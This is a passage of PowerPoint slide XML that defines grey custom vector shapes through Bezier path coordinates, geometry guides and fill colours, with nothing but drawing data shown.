                      <a:pt x="1094277" y="25251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1087991" y="6964"/>
                      <a:pt x="1080563" y="-1036"/>
                      <a:pt x="1059419" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1013131" y="2964"/>
                      <a:pt x="181093" y="35537"/>
                      <a:pt x="62802" y="41251"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-9201" y="44680"/>
                      <a:pt x="-9201" y="41823"/>
                      <a:pt x="13086" y="109255"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64517" y="264690"/>
                      <a:pt x="115948" y="420126"/>
                      <a:pt x="166807" y="575561"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254811" y="845288"/>
                      <a:pt x="342243" y="1115586"/>
                      <a:pt x="430247" y="1385312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="442248" y="1422457"/>
                      <a:pt x="442819" y="1421314"/>
                      <a:pt x="478250" y="1408742"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="687973" y="1333881"/>
                      <a:pt x="897126" y="1259592"/>
                      <a:pt x="1106278" y="1184160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1152566" y="1167588"/>
                      <a:pt x="1201139" y="1155016"/>
                      <a:pt x="1245141" y="1132729"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1245141" y="1132729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245141" y="1132729"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1304573" y="1112157"/>
                      <a:pt x="1364004" y="1090442"/>
                      <a:pt x="1424007" y="1071012"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1445150" y="1065298"/>
                      <a:pt x="1449722" y="1057869"/>
                      <a:pt x="1442293" y="1036725"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1442293" y="1036725"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8F8C8D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5FE72C1-75ED-460D-9A9F-079970AFE9A3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7048837" y="4800764"/>
                <a:ext cx="1251998" cy="1394255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1251999 w 1251998"/>
                  <a:gd name="connsiteY0" fmla="*/ 1108050 h 1394255"/>
                  <a:gd name="connsiteX1" fmla="*/ 413104 w 1251998"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1394255"/>
                  <a:gd name="connsiteX2" fmla="*/ 62802 w 1251998"/>
                  <a:gd name="connsiteY2" fmla="*/ 16001 h 1394255"/>
                  <a:gd name="connsiteX3" fmla="*/ 13086 w 1251998"/>
                  <a:gd name="connsiteY3" fmla="*/ 84575 h 1394255"/>
                  <a:gd name="connsiteX4" fmla="*/ 166807 w 1251998"/>
                  <a:gd name="connsiteY4" fmla="*/ 551453 h 1394255"/>
                  <a:gd name="connsiteX5" fmla="*/ 429676 w 1251998"/>
                  <a:gd name="connsiteY5" fmla="*/ 1362919 h 1394255"/>
                  <a:gd name="connsiteX6" fmla="*/ 477678 w 1251998"/>
                  <a:gd name="connsiteY6" fmla="*/ 1386348 h 1394255"/>
                  <a:gd name="connsiteX7" fmla="*/ 1105706 w 1251998"/>
                  <a:gd name="connsiteY7" fmla="*/ 1161195 h 1394255"/>
                  <a:gd name="connsiteX8" fmla="*/ 1244570 w 1251998"/>
                  <a:gd name="connsiteY8" fmla="*/ 1109764 h 1394255"/>
                  <a:gd name="connsiteX9" fmla="*/ 1244570 w 1251998"/>
                  <a:gd name="connsiteY9" fmla="*/ 1109764 h 1394255"/>
                  <a:gd name="connsiteX10" fmla="*/ 1244570 w 1251998"/>
                  <a:gd name="connsiteY10" fmla="*/ 1109764 h 1394255"/>
                  <a:gd name="connsiteX11" fmla="*/ 1251999 w 1251998"/>
                  <a:gd name="connsiteY11" fmla="*/ 1108050 h 1394255"/>
                  <a:gd name="connsiteX12" fmla="*/ 1251999 w 1251998"/>
                  <a:gd name="connsiteY12" fmla="*/ 1108050 h 139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51998" h="1394255">
                    <a:moveTo>
                      <a:pt x="1251999" y="1108050"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="413104" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="296527" y="10858"/>
                      <a:pt x="179379" y="10286"/>
                      <a:pt x="62802" y="16001"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-9201" y="19429"/>
                      <a:pt x="-9201" y="16572"/>
                      <a:pt x="13086" y="84575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64517" y="240011"/>
                      <a:pt x="115948" y="396018"/>
                      <a:pt x="166807" y="551453"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254811" y="821751"/>
                      <a:pt x="342243" y="1092049"/>
                      <a:pt x="429676" y="1362919"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="441677" y="1400063"/>
                      <a:pt x="442248" y="1398920"/>
                      <a:pt x="477678" y="1386348"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="686830" y="1311488"/>
                      <a:pt x="896554" y="1237199"/>
                      <a:pt x="1105706" y="1161195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1151994" y="1144623"/>
                      <a:pt x="1200568" y="1132051"/>
                      <a:pt x="1244570" y="1109764"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1244570" y="1109764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1244570" y="1109764"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1247427" y="1109764"/>
                      <a:pt x="1249713" y="1108621"/>
                      <a:pt x="1251999" y="1108050"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1251999" y="1108050"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6F6F6F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5479061-3106-48F1-AEB5-5D975D29AA08}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7409336" y="6400982"/>
                <a:ext cx="1760252" cy="217078"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1634963 w 1760252"/>
                  <a:gd name="connsiteY0" fmla="*/ 216435 h 217078"/>
                  <a:gd name="connsiteX1" fmla="*/ 84035 w 1760252"/>
                  <a:gd name="connsiteY1" fmla="*/ 121574 h 217078"/>
                  <a:gd name="connsiteX2" fmla="*/ 603 w 1760252"/>
                  <a:gd name="connsiteY2" fmla="*/ 29570 h 217078"/>
                  <a:gd name="connsiteX3" fmla="*/ 37748 w 1760252"/>
                  <a:gd name="connsiteY3" fmla="*/ 997 h 217078"/>
                  <a:gd name="connsiteX4" fmla="*/ 1735539 w 1760252"/>
                  <a:gd name="connsiteY4" fmla="*/ 162718 h 217078"/>
                  <a:gd name="connsiteX5" fmla="*/ 1760111 w 1760252"/>
                  <a:gd name="connsiteY5" fmla="*/ 178719 h 217078"/>
                  <a:gd name="connsiteX6" fmla="*/ 1737824 w 1760252"/>
                  <a:gd name="connsiteY6" fmla="*/ 197577 h 217078"/>
                  <a:gd name="connsiteX7" fmla="*/ 1634963 w 1760252"/>
                  <a:gd name="connsiteY7" fmla="*/ 216435 h 217078"/>
                  <a:gd name="connsiteX8" fmla="*/ 1634963 w 1760252"/>
                  <a:gd name="connsiteY8" fmla="*/ 216435 h 21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0252" h="217078">
                    <a:moveTo>
                      <a:pt x="1634963" y="216435"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1518386" y="208435"/>
                      <a:pt x="207470" y="130145"/>
                      <a:pt x="84035" y="121574"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30319" y="118145"/>
                      <a:pt x="-5111" y="77572"/>
                      <a:pt x="603" y="29570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3460" y="7854"/>
                      <a:pt x="13175" y="-3575"/>
                      <a:pt x="37748" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112608" y="13569"/>
                      <a:pt x="1641820" y="147289"/>
                      <a:pt x="1735539" y="162718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1746968" y="164433"/>
                      <a:pt x="1758397" y="167290"/>
                      <a:pt x="1760111" y="178719"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1761825" y="192434"/>
                      <a:pt x="1747539" y="194148"/>
                      <a:pt x="1737824" y="197577"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1704109" y="209006"/>
                      <a:pt x="1670964" y="219864"/>
                      <a:pt x="1634963" y="216435"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1634963" y="216435"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6F6F6F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A4DD47D-026B-420B-85D5-D64A55C593AF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6952507" y="4726584"/>
                <a:ext cx="531234" cy="1611633"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 531149 w 531234"/>
                  <a:gd name="connsiteY0" fmla="*/ 1599963 h 1611633"/>
                  <a:gd name="connsiteX1" fmla="*/ 524291 w 531234"/>
                  <a:gd name="connsiteY1" fmla="*/ 1610821 h 1611633"/>
                  <a:gd name="connsiteX2" fmla="*/ 511719 w 531234"/>
                  <a:gd name="connsiteY2" fmla="*/ 1606249 h 1611633"/>
                  <a:gd name="connsiteX3" fmla="*/ 500290 w 531234"/>
                  <a:gd name="connsiteY3" fmla="*/ 1573105 h 1611633"/>
                  <a:gd name="connsiteX4" fmla="*/ 294567 w 531234"/>
                  <a:gd name="connsiteY4" fmla="*/ 933648 h 1611633"/>
                  <a:gd name="connsiteX5" fmla="*/ 8840 w 531234"/>
                  <a:gd name="connsiteY5" fmla="*/ 36464 h 1611633"/>
                  <a:gd name="connsiteX6" fmla="*/ 8268 w 531234"/>
                  <a:gd name="connsiteY6" fmla="*/ 1034 h 1611633"/>
                  <a:gd name="connsiteX7" fmla="*/ 28269 w 531234"/>
                  <a:gd name="connsiteY7" fmla="*/ 29035 h 1611633"/>
                  <a:gd name="connsiteX8" fmla="*/ 288281 w 531234"/>
                  <a:gd name="connsiteY8" fmla="*/ 843358 h 1611633"/>
                  <a:gd name="connsiteX9" fmla="*/ 524863 w 531234"/>
                  <a:gd name="connsiteY9" fmla="*/ 1579962 h 1611633"/>
                  <a:gd name="connsiteX10" fmla="*/ 531149 w 531234"/>
                  <a:gd name="connsiteY10" fmla="*/ 1599963 h 1611633"/>
                  <a:gd name="connsiteX11" fmla="*/ 531149 w 531234"/>
                  <a:gd name="connsiteY11" fmla="*/ 1599963 h 16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1234" h="1611633">
                    <a:moveTo>
                      <a:pt x="531149" y="1599963"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="531720" y="1604535"/>
                      <a:pt x="529434" y="1608535"/>
                      <a:pt x="524291" y="1610821"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="518577" y="1613107"/>
                      <a:pt x="514005" y="1610249"/>
                      <a:pt x="511719" y="1606249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="507148" y="1595392"/>
                      <a:pt x="503719" y="1584534"/>
                      <a:pt x="500290" y="1573105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="431716" y="1359953"/>
                      <a:pt x="363141" y="1146800"/>
                      <a:pt x="294567" y="933648"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="199134" y="634777"/>
                      <a:pt x="103701" y="335335"/>
                      <a:pt x="8840" y="36464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5411" y="25607"/>
                      <a:pt x="-8876" y="6749"/>
                      <a:pt x="8268" y="1034"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27126" y="-5252"/>
                      <a:pt x="24840" y="18749"/>
                      <a:pt x="28269" y="29035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115702" y="299905"/>
                      <a:pt x="201420" y="571917"/>
                      <a:pt x="288281" y="843358"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="366570" y="1089083"/>
                      <a:pt x="446002" y="1334237"/>
                      <a:pt x="524863" y="1579962"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="526577" y="1585677"/>
                      <a:pt x="528292" y="1592535"/>
                      <a:pt x="531149" y="1599963"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="531149" y="1599963"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="90909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C3EB090-BA02-4DB4-8FDB-8FDC0F7C9B6F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7729130" y="6057561"/>
                <a:ext cx="662402" cy="280414"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 13395 w 662402"/>
                  <a:gd name="connsiteY0" fmla="*/ 280415 h 280414"/>
                  <a:gd name="connsiteX1" fmla="*/ 251 w 662402"/>
                  <a:gd name="connsiteY1" fmla="*/ 273557 h 280414"/>
                  <a:gd name="connsiteX2" fmla="*/ 11109 w 662402"/>
                  <a:gd name="connsiteY2" fmla="*/ 259271 h 280414"/>
                  <a:gd name="connsiteX3" fmla="*/ 628280 w 662402"/>
                  <a:gd name="connsiteY3" fmla="*/ 10117 h 280414"/>
                  <a:gd name="connsiteX4" fmla="*/ 660853 w 662402"/>
                  <a:gd name="connsiteY4" fmla="*/ 7260 h 280414"/>
                  <a:gd name="connsiteX5" fmla="*/ 636852 w 662402"/>
                  <a:gd name="connsiteY5" fmla="*/ 28975 h 280414"/>
                  <a:gd name="connsiteX6" fmla="*/ 13395 w 662402"/>
                  <a:gd name="connsiteY6" fmla="*/ 280415 h 280414"/>
                  <a:gd name="connsiteX7" fmla="*/ 13395 w 662402"/>
                  <a:gd name="connsiteY7" fmla="*/ 280415 h 28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2402" h="280414">
                    <a:moveTo>
                      <a:pt x="13395" y="280415"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6537" y="280415"/>
                      <a:pt x="1394" y="279844"/>
                      <a:pt x="251" y="273557"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-1463" y="264414"/>
                      <a:pt x="5966" y="261557"/>
                      <a:pt x="11109" y="259271"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48825" y="243270"/>
                      <a:pt x="460272" y="77549"/>
                      <a:pt x="628280" y="10117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="638566" y="6117"/>
                      <a:pt x="653995" y="-8741"/>
                      <a:pt x="660853" y="7260"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="668282" y="23832"/>
                      <a:pt x="647138" y="24403"/>
                      <a:pt x="636852" y="28975"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="435700" y="111265"/>
                      <a:pt x="18538" y="278701"/>
                      <a:pt x="13395" y="280415"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13395" y="280415"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="908F9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9222B66-565D-4CD2-A329-F43DC5F56A78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7609376" y="6263687"/>
                <a:ext cx="114290" cy="51430"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 114290"/>
                  <a:gd name="connsiteY0" fmla="*/ 42288 h 51430"/>
                  <a:gd name="connsiteX1" fmla="*/ 110862 w 114290"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 51430"/>
                  <a:gd name="connsiteX2" fmla="*/ 114291 w 114290"/>
                  <a:gd name="connsiteY2" fmla="*/ 9143 h 51430"/>
                  <a:gd name="connsiteX3" fmla="*/ 3429 w 114290"/>
                  <a:gd name="connsiteY3" fmla="*/ 51431 h 51430"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 114290"/>
                  <a:gd name="connsiteY4" fmla="*/ 42288 h 51430"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 114290"/>
                  <a:gd name="connsiteY5" fmla="*/ 42288 h 5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290" h="51430">
                    <a:moveTo>
                      <a:pt x="0" y="42288"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36573" y="28001"/>
                      <a:pt x="73718" y="14286"/>
                      <a:pt x="110862" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112005" y="3429"/>
                      <a:pt x="113148" y="6286"/>
                      <a:pt x="114291" y="9143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77718" y="23429"/>
                      <a:pt x="40573" y="37145"/>
                      <a:pt x="3429" y="51431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2286" y="48574"/>
                      <a:pt x="1143" y="45145"/>
                      <a:pt x="0" y="42288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="42288"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D0D0D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039D36E-0AAC-41F5-B1B5-586258C5DCB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8541253" y="2819156"/>
              <a:ext cx="3650747" cy="4038844"/>
              <a:chOff x="8541253" y="2819156"/>
              <a:chExt cx="3650747" cy="4038844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7B1B211-EE5F-45BE-83E9-AE726148E14C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9620173" y="4143560"/>
                <a:ext cx="2571827" cy="2714440"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1550356 w 2619983"/>
                  <a:gd name="connsiteY0" fmla="*/ 29716 h 2765267"/>
                  <a:gd name="connsiteX1" fmla="*/ 1818939 w 2619983"/>
                  <a:gd name="connsiteY1" fmla="*/ 176579 h 2765267"/>
                  <a:gd name="connsiteX2" fmla="*/ 2097809 w 2619983"/>
                  <a:gd name="connsiteY2" fmla="*/ 361731 h 2765267"/>
                  <a:gd name="connsiteX3" fmla="*/ 2502398 w 2619983"/>
                  <a:gd name="connsiteY3" fmla="*/ 974330 h 2765267"/>
                  <a:gd name="connsiteX4" fmla="*/ 2593831 w 2619983"/>
                  <a:gd name="connsiteY4" fmla="*/ 1389777 h 2765267"/>
                  <a:gd name="connsiteX5" fmla="*/ 2619547 w 2619983"/>
                  <a:gd name="connsiteY5" fmla="*/ 2749838 h 2765267"/>
                  <a:gd name="connsiteX6" fmla="*/ 2604118 w 2619983"/>
                  <a:gd name="connsiteY6" fmla="*/ 2765267 h 2765267"/>
                  <a:gd name="connsiteX7" fmla="*/ 2594403 w 2619983"/>
                  <a:gd name="connsiteY7" fmla="*/ 2764696 h 2765267"/>
                  <a:gd name="connsiteX8" fmla="*/ 52002 w 2619983"/>
                  <a:gd name="connsiteY8" fmla="*/ 2764696 h 2765267"/>
                  <a:gd name="connsiteX9" fmla="*/ 49145 w 2619983"/>
                  <a:gd name="connsiteY9" fmla="*/ 2764696 h 2765267"/>
                  <a:gd name="connsiteX10" fmla="*/ 66289 w 2619983"/>
                  <a:gd name="connsiteY10" fmla="*/ 2446396 h 2765267"/>
                  <a:gd name="connsiteX11" fmla="*/ 266298 w 2619983"/>
                  <a:gd name="connsiteY11" fmla="*/ 2153811 h 2765267"/>
                  <a:gd name="connsiteX12" fmla="*/ 269155 w 2619983"/>
                  <a:gd name="connsiteY12" fmla="*/ 2152668 h 2765267"/>
                  <a:gd name="connsiteX13" fmla="*/ 543453 w 2619983"/>
                  <a:gd name="connsiteY13" fmla="*/ 2153240 h 2765267"/>
                  <a:gd name="connsiteX14" fmla="*/ 549739 w 2619983"/>
                  <a:gd name="connsiteY14" fmla="*/ 2155526 h 2765267"/>
                  <a:gd name="connsiteX15" fmla="*/ 747462 w 2619983"/>
                  <a:gd name="connsiteY15" fmla="*/ 2181813 h 2765267"/>
                  <a:gd name="connsiteX16" fmla="*/ 750891 w 2619983"/>
                  <a:gd name="connsiteY16" fmla="*/ 2181813 h 2765267"/>
                  <a:gd name="connsiteX17" fmla="*/ 763463 w 2619983"/>
                  <a:gd name="connsiteY17" fmla="*/ 2156097 h 2765267"/>
                  <a:gd name="connsiteX18" fmla="*/ 753748 w 2619983"/>
                  <a:gd name="connsiteY18" fmla="*/ 2143525 h 2765267"/>
                  <a:gd name="connsiteX19" fmla="*/ 694317 w 2619983"/>
                  <a:gd name="connsiteY19" fmla="*/ 2010376 h 2765267"/>
                  <a:gd name="connsiteX20" fmla="*/ 665173 w 2619983"/>
                  <a:gd name="connsiteY20" fmla="*/ 1980661 h 2765267"/>
                  <a:gd name="connsiteX21" fmla="*/ 641172 w 2619983"/>
                  <a:gd name="connsiteY21" fmla="*/ 1970946 h 2765267"/>
                  <a:gd name="connsiteX22" fmla="*/ 555454 w 2619983"/>
                  <a:gd name="connsiteY22" fmla="*/ 1953231 h 2765267"/>
                  <a:gd name="connsiteX23" fmla="*/ 306299 w 2619983"/>
                  <a:gd name="connsiteY23" fmla="*/ 1973232 h 2765267"/>
                  <a:gd name="connsiteX24" fmla="*/ 70289 w 2619983"/>
                  <a:gd name="connsiteY24" fmla="*/ 1953802 h 2765267"/>
                  <a:gd name="connsiteX25" fmla="*/ 133149 w 2619983"/>
                  <a:gd name="connsiteY25" fmla="*/ 1856655 h 2765267"/>
                  <a:gd name="connsiteX26" fmla="*/ 127434 w 2619983"/>
                  <a:gd name="connsiteY26" fmla="*/ 1732078 h 2765267"/>
                  <a:gd name="connsiteX27" fmla="*/ 0 w 2619983"/>
                  <a:gd name="connsiteY27" fmla="*/ 1622930 h 2765267"/>
                  <a:gd name="connsiteX28" fmla="*/ 205724 w 2619983"/>
                  <a:gd name="connsiteY28" fmla="*/ 1596072 h 2765267"/>
                  <a:gd name="connsiteX29" fmla="*/ 257154 w 2619983"/>
                  <a:gd name="connsiteY29" fmla="*/ 1580071 h 2765267"/>
                  <a:gd name="connsiteX30" fmla="*/ 358873 w 2619983"/>
                  <a:gd name="connsiteY30" fmla="*/ 1557213 h 2765267"/>
                  <a:gd name="connsiteX31" fmla="*/ 389732 w 2619983"/>
                  <a:gd name="connsiteY31" fmla="*/ 1545212 h 2765267"/>
                  <a:gd name="connsiteX32" fmla="*/ 496594 w 2619983"/>
                  <a:gd name="connsiteY32" fmla="*/ 1495496 h 2765267"/>
                  <a:gd name="connsiteX33" fmla="*/ 561168 w 2619983"/>
                  <a:gd name="connsiteY33" fmla="*/ 1446922 h 2765267"/>
                  <a:gd name="connsiteX34" fmla="*/ 588598 w 2619983"/>
                  <a:gd name="connsiteY34" fmla="*/ 1332060 h 2765267"/>
                  <a:gd name="connsiteX35" fmla="*/ 595456 w 2619983"/>
                  <a:gd name="connsiteY35" fmla="*/ 1076048 h 2765267"/>
                  <a:gd name="connsiteX36" fmla="*/ 586884 w 2619983"/>
                  <a:gd name="connsiteY36" fmla="*/ 886897 h 2765267"/>
                  <a:gd name="connsiteX37" fmla="*/ 614313 w 2619983"/>
                  <a:gd name="connsiteY37" fmla="*/ 677745 h 2765267"/>
                  <a:gd name="connsiteX38" fmla="*/ 710318 w 2619983"/>
                  <a:gd name="connsiteY38" fmla="*/ 530881 h 2765267"/>
                  <a:gd name="connsiteX39" fmla="*/ 770320 w 2619983"/>
                  <a:gd name="connsiteY39" fmla="*/ 472021 h 2765267"/>
                  <a:gd name="connsiteX40" fmla="*/ 1458923 w 2619983"/>
                  <a:gd name="connsiteY40" fmla="*/ 0 h 2765267"/>
                  <a:gd name="connsiteX41" fmla="*/ 1460637 w 2619983"/>
                  <a:gd name="connsiteY41" fmla="*/ 0 h 2765267"/>
                  <a:gd name="connsiteX42" fmla="*/ 1550356 w 2619983"/>
                  <a:gd name="connsiteY42" fmla="*/ 29716 h 276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619983" h="2765267">
                    <a:moveTo>
                      <a:pt x="1550356" y="29716"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1627502" y="102862"/>
                      <a:pt x="1718363" y="145149"/>
                      <a:pt x="1818939" y="176579"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1926944" y="210867"/>
                      <a:pt x="2018948" y="279441"/>
                      <a:pt x="2097809" y="361731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2269245" y="541739"/>
                      <a:pt x="2406394" y="745176"/>
                      <a:pt x="2502398" y="974330"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2558401" y="1106907"/>
                      <a:pt x="2579545" y="1248056"/>
                      <a:pt x="2593831" y="1389777"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2610975" y="1559499"/>
                      <a:pt x="2622404" y="2631547"/>
                      <a:pt x="2619547" y="2749838"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2619547" y="2758410"/>
                      <a:pt x="2612689" y="2765267"/>
                      <a:pt x="2604118" y="2765267"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2600689" y="2765267"/>
                      <a:pt x="2597260" y="2764696"/>
                      <a:pt x="2594403" y="2764696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1746936" y="2764696"/>
                      <a:pt x="899469" y="2765267"/>
                      <a:pt x="52002" y="2764696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48002" y="2764696"/>
                      <a:pt x="52574" y="2764696"/>
                      <a:pt x="49145" y="2764696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32573" y="2753267"/>
                      <a:pt x="57717" y="2512685"/>
                      <a:pt x="66289" y="2446396"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82861" y="2313819"/>
                      <a:pt x="154293" y="2220672"/>
                      <a:pt x="266298" y="2153811"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="269727" y="2152668"/>
                      <a:pt x="265155" y="2153240"/>
                      <a:pt x="269155" y="2152668"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="360588" y="2143525"/>
                      <a:pt x="452020" y="2141811"/>
                      <a:pt x="543453" y="2153240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="545739" y="2153240"/>
                      <a:pt x="548025" y="2154383"/>
                      <a:pt x="549739" y="2155526"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="611456" y="2194384"/>
                      <a:pt x="677745" y="2198385"/>
                      <a:pt x="747462" y="2181813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="748605" y="2181813"/>
                      <a:pt x="749748" y="2181813"/>
                      <a:pt x="750891" y="2181813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="764035" y="2181813"/>
                      <a:pt x="771463" y="2166383"/>
                      <a:pt x="763463" y="2156097"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="760034" y="2152097"/>
                      <a:pt x="756605" y="2147526"/>
                      <a:pt x="753748" y="2143525"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="722890" y="2104095"/>
                      <a:pt x="696603" y="2062950"/>
                      <a:pt x="694317" y="2010376"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="693745" y="1991518"/>
                      <a:pt x="687460" y="1978946"/>
